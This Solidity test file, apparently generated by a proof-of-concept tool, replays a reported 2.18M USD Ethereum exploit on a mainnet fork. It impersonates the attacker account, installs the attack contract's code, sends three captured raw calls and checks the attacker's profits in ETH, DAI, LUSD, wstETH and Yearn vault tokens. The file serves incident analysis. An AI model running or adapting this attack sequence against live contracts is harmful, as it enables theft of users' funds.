// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.20;

import {Test, console2} from "forge-std/Test.sol";
import {LumosPoCBase} from "./LumosPoCBase.sol";

// @KeyInfo - Total Lost : 2.18M USD
// Attacker : 0x0f18d8b44a740272f0be4d08338d2b165b7edd17
// Attack Contract : 0x06f585f74e0da633ae813a0f23fb9900b61d0fcd
// Vulnerable Contract : 0xff1f2b4adb9df6fc8eafecdcbf96a2b351680455
// Attack Tx : 0x074ec9317d8336db37e8c348fbdd7515573ff4088239c77ab429f522509aeeb1
// Block : 25315715
// Chain : Ethereum
// Analysis :
//
// @Reproduction
// Verdict : pass
// Economic Proof : attacker_profit_reproduction
// Reproduced Value : 2.18M USD
//
// @POC Author
// Generated by LumosKit

contract AttackTest is LumosPoCBase {
    address constant ATTACKER_EOA = LumosAddresses.attacker_eoa;
    address constant ATTACK_CONTRACT = LumosAddresses.attack_contract;
    uint256 constant FORK_BLOCK = 25315714;
    uint256 constant TX_TIMESTAMP = 1781439983;
    uint256 constant TX_BLOCK_NUMBER = 25315715;
    uint256 constant TX_VALUE = 0;

    function setUp() public {
        vm.createSelectFork(vm.envString("LUMOSKIT_FORK_ENDPOINT"));
        if (TX_TIMESTAMP != 0) vm.warp(TX_TIMESTAMP);
        if (TX_BLOCK_NUMBER != 0) vm.roll(TX_BLOCK_NUMBER);
    }

    function testPoC() public {
        _runExploit();
    }

    function _runExploit() internal {
        vm.startPrank(ATTACKER_EOA, ATTACKER_EOA);
        OurAttack attack;
        if (ATTACK_CONTRACT != address(0)) {
            _installRuntime();
            attack = OurAttack(payable(ATTACK_CONTRACT));
        } else {
            attack = new OurAttack();
        }
        _expectOutcome(address(attack), address(0));
        _snapProfit();
        _logBalances("Before exploit");
        attack.attack{value: TX_VALUE}();
        _logBalances("After exploit");
        vm.stopPrank();
        _assertProfit();
    }

    function _installRuntime() internal {
        vm.etch(ATTACK_CONTRACT, type(OurAttack).runtimeCode);
    }

    function _expectOutcome(address attack, address helper) internal {
        attack;
        helper;
        _expectProfit(LumosAddresses.attacker_eoa, address(0), LumosAddresses.ZERO, "ETH", 908986186412605034854);
        _expectProfit(LumosAddresses.attacker_eoa, address(0), LumosAddresses.yvLUSD, "yvLUSD", 359047484523695640986);
        _expectProfit(LumosAddresses.attacker_eoa, address(0), LumosAddresses.LUSD, "LUSD", 9273734320992446140764);
        _expectProfit(LumosAddresses.attacker_eoa, address(0), LumosAddresses.DAI, "DAI", 270513054157632152892774);
        _expectProfit(LumosAddresses.attacker_eoa, address(0), LumosAddresses.wstETH, "wstETH", 167890392526462638142);
        _expectProfit(LumosAddresses.attacker_eoa, address(0), LumosAddresses.yvWETH, "yvWETH", 16569551230652464753);
        _expectProfit(LumosAddresses.attacker_eoa, address(0), LumosAddresses.yvDAI, "yvDAI", 4873856656463299373447);
    }
}

contract OurAttack {
    function attack() external payable {
        _attack();
    }

    function _attack() internal {
        {
            bytes memory observedCallData = hex"48388c88"; // artifact calldata preserved: pseudocode raw_call action_0000 line 29 requires exact artifact calldata
            (bool ok,) = LumosAddresses.A_E810F6_0BCE.call(observedCallData);
            require(ok, "observed selector 0x48388c88 failed");
        }
        {
            bytes memory observedCallData = hex"14124fa9"; // artifact calldata preserved: pseudocode raw_call action_0001 line 32 requires exact artifact calldata
            (bool ok,) = LumosAddresses.A_D10916_E0F8.call(observedCallData);
            require(ok, "observed selector 0x14124fa9 failed");
        }
        {
            bytes memory observedCallData = hex"b5de7a2f"; // artifact calldata preserved: pseudocode raw_call action_0002 line 35 requires exact artifact calldata
            (bool ok,) = LumosAddresses.A_276E97_F6EC.call(observedCallData);
            require(ok, "observed selector 0xb5de7a2f failed");
        }
    }

    receive() external payable {}

    fallback() external payable {
        if (msg.sig == 0x6f3ce701) {
            _attack();
            return;
        }
        _entryCb();
    }

    function _entryCb() internal {}

    mapping(uint256 => uint256) private _lumosEntryCallbackCursor;
    mapping(address => uint256) private _lumosBalancerVaultPreBalance;

    function _nextEntryCb(uint256 index) internal returns (uint256 ordinal) {
        ordinal = _lumosEntryCallbackCursor[index];
        _lumosEntryCallbackCursor[index] = ordinal + 1;
    }

    function _recordBalancerPre(address[] memory tokens) internal {
        for (uint256 i = 0; i < tokens.length; i++) {
            _lumosBalancerVaultPreBalance[tokens[i]] =
                IERC20Like(tokens[i]).balanceOf(0xBA12222222228d8Ba445958a75a0704d566BF2C8);
        }
    }

    function lumosRecordBalancerPre(address[] memory tokens) external {
        _recordBalancerPre(tokens);
    }

    function lumosBalancerVaultPreBalance(address token) external view returns (uint256) {
        return _lumosBalancerVaultPreBalance[token];
    }
}

interface IERC20Like {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external;
    function transfer(address to, uint256 amount) external;
    function transferFrom(address from, address to, uint256 amount) external;
}

interface ILumosWETHLike {
    function deposit() external payable;
}

interface IERC721Like {
    function ownerOf(uint256 tokenId) external view returns (address);
    function getApproved(uint256 tokenId) external view returns (address);
    function isApprovedForAll(address owner, address operator) external view returns (bool);
    function transferFrom(address from, address to, uint256 tokenId) external;
    function safeTransferFrom(address from, address to, uint256 tokenId) external;
}

interface ILumosUniswapV2PairLike {
    function mint(address to) external returns (uint256 liquidity);
    function burn(address to) external returns (uint256 amount0, uint256 amount1);
    function skim(address to) external;
    function sync() external;
    function swap(uint256 amount0Out, uint256 amount1Out, address to, bytes calldata data) external;
}

interface IMulticallLike {
    function multicall(bytes[] calldata data) external returns (bytes[] memory results);
}

struct LumosObservedCall {
    address target;
    bytes data;
}

library LumosAddresses {
    address internal constant ZERO = address(0);
    address internal constant attack_contract = 0x06f585F74e0DA633Ae813A0f23Fb9900B61d0fcD; // address(this) = 0x06f585f74e0da633ae813a0f23fb9900b61d0fcd label=attack_contract roles=attacker_contract|attacker_entry_contract|code_contract|contract|localized_contract|storage_contract source=localize.localized_call_graph confidence=high
    address internal constant attacker_eoa = 0x0F18D8b44a740272f0be4d08338d2b165b7EdD17; // LumosAddresses.attacker_eoa = 0x0f18d8b44a740272f0be4d08338d2b165b7edd17 label=attacker_eoa roles=attacker_eoa|code_contract|contract|economic_holder|observed_address|profit_holder|recipient|sender|storage_contract source=tx_metadata.from confidence=high
    address internal constant A_276E97_F6EC = 0x276E972ffD99bD8dF705dB3F735a95F655CcF6eC; // LumosAddresses.A_276E97_F6EC = 0x276e972ffd99bd8df705db3f735a95f655ccf6ec label=unresolved roles=observed_address|recipient|sender source=unresolved confidence=low
    address internal constant yvLUSD = 0x378cb52b00F9D0921cb46dFc099CFf73b42419dC; // LumosAddresses.yvLUSD = 0x378cb52b00f9d0921cb46dfc099cff73b42419dc label=yvLUSD token_symbol=yvLUSD roles=asset|contract|economic_asset|observed_address|profit_asset|recipient|storage_contract|token_related source=asset_delta.profit_candidates confidence=medium
    address internal constant A_4CF326_4927 = 0x4cf32670a53657596E641DFCC6d40f01e4d64927; // LumosAddresses.A_4CF326_4927 = 0x4cf32670a53657596e641dfcc6d40f01e4d64927 label=unresolved roles=asset|code_contract|contract|observed_address|recipient|sender|storage_contract source=unresolved confidence=low
    address internal constant LUSD = 0x5f98805A4E8be255a32880FDeC7F6728C6568bA0; // LumosAddresses.LUSD = 0x5f98805a4e8be255a32880fdec7f6728c6568ba0 label=LUSD token_symbol=LUSD roles=asset|contract|economic_asset|observed_address|profit_asset|recipient|token_related source=asset_delta.profit_candidates confidence=medium
    address internal constant yvLINK = 0x671a912C10bba0CFA74Cfc2d6Fba9BA1ed9530B2; // LumosAddresses.yvLINK = 0x671a912c10bba0cfa74cfc2d6fba9ba1ed9530b2 label=Vyper_contract token_symbol=yvLINK roles=asset|contract|observed_address|recipient source=etherscan_v2 confidence=high
    address internal constant DAI = 0x6B175474E89094C44Da98b954EedeAC495271d0F; // LumosAddresses.DAI = 0x6b175474e89094c44da98b954eedeac495271d0f label=Dai token_symbol=DAI roles=asset|contract|economic_asset|observed_address|profit_asset|recipient|token_related source=etherscan_v2 confidence=high
    address internal constant wstETH = 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0; // LumosAddresses.wstETH = 0x7f39c581f595b53c5cb19bd0b3f8da6c935e2ca0 label=WstETH token_symbol=wstETH roles=asset|contract|economic_asset|observed_address|profit_asset|recipient|token_related source=etherscan_v2 confidence=high
    address internal constant Vyper_contract_9C13E2 = 0x9C13e225AE007731caA49Fd17A41379ab1a489F4; // LumosAddresses.Vyper_contract_9C13E2 = 0x9c13e225ae007731caa49fd17a41379ab1a489f4 label=Vyper_contract roles=asset|contract|observed_address|recipient source=etherscan_v2 confidence=high
    address internal constant yvWETH = 0xa258C4606Ca8206D8aA700cE2143D7db854D168c; // LumosAddresses.yvWETH = 0xa258c4606ca8206d8aa700ce2143d7db854d168c label=Vyper_contract token_symbol=yvWETH roles=asset|contract|economic_asset|observed_address|profit_asset|recipient|storage_contract|token_related source=etherscan_v2 confidence=high
    address internal constant BalancerVault = 0xBA12222222228d8Ba445958a75a0704d566BF2C8; // LumosAddresses.BalancerVault = 0xba12222222228d8ba445958a75a0704d566bf2c8 label=BalancerVault roles=known_protocol source=poc_sketch.known_addresses confidence=high
    address internal constant A_D10916_E0F8 = 0xd10916A49e09321C983f0dFD8a546aE83Fb0E0f8; // LumosAddresses.A_D10916_E0F8 = 0xd10916a49e09321c983f0dfd8a546ae83fb0e0f8 label=unresolved roles=observed_address|recipient|sender source=unresolved confidence=low
    address internal constant A_D64791_3321 = 0xD64791E747188b0e5061fC65b56Bf20FeE2e3321; // LumosAddresses.A_D64791_3321 = 0xd64791e747188b0e5061fc65b56bf20fee2e3321 label=unresolved roles=code_contract|contract|observed_address|recipient|storage_contract source=unresolved confidence=low
    address internal constant yvDAI = 0xdA816459F1AB5631232FE5e97a05BBBb94970c95; // LumosAddresses.yvDAI = 0xda816459f1ab5631232fe5e97a05bbbb94970c95 label=Vyper_contract token_symbol=yvDAI roles=asset|contract|economic_asset|observed_address|profit_asset|recipient|storage_contract|token_related source=etherscan_v2 confidence=high
    address internal constant A_E810F6_0BCE = 0xE810F602aa8B45Cc565f93E2141e740F0a640BCE; // LumosAddresses.A_E810F6_0BCE = 0xe810f602aa8b45cc565f93e2141e740f0a640bce label=unresolved roles=observed_address|recipient source=unresolved confidence=low
    address internal constant TransparentUpgradeableProxy_FF1F2B = 0xFF1F2B4ADb9dF6FC8eAFecDcbF96A2B351680455; // LumosAddresses.TransparentUpgradeableProxy_FF1F2B = 0xff1f2b4adb9df6fc8eafecdcbf96a2b351680455 label=TransparentUpgradeableProxy roles=asset|contract|observed_address|sender|storage_contract source=etherscan_v2 confidence=high
}
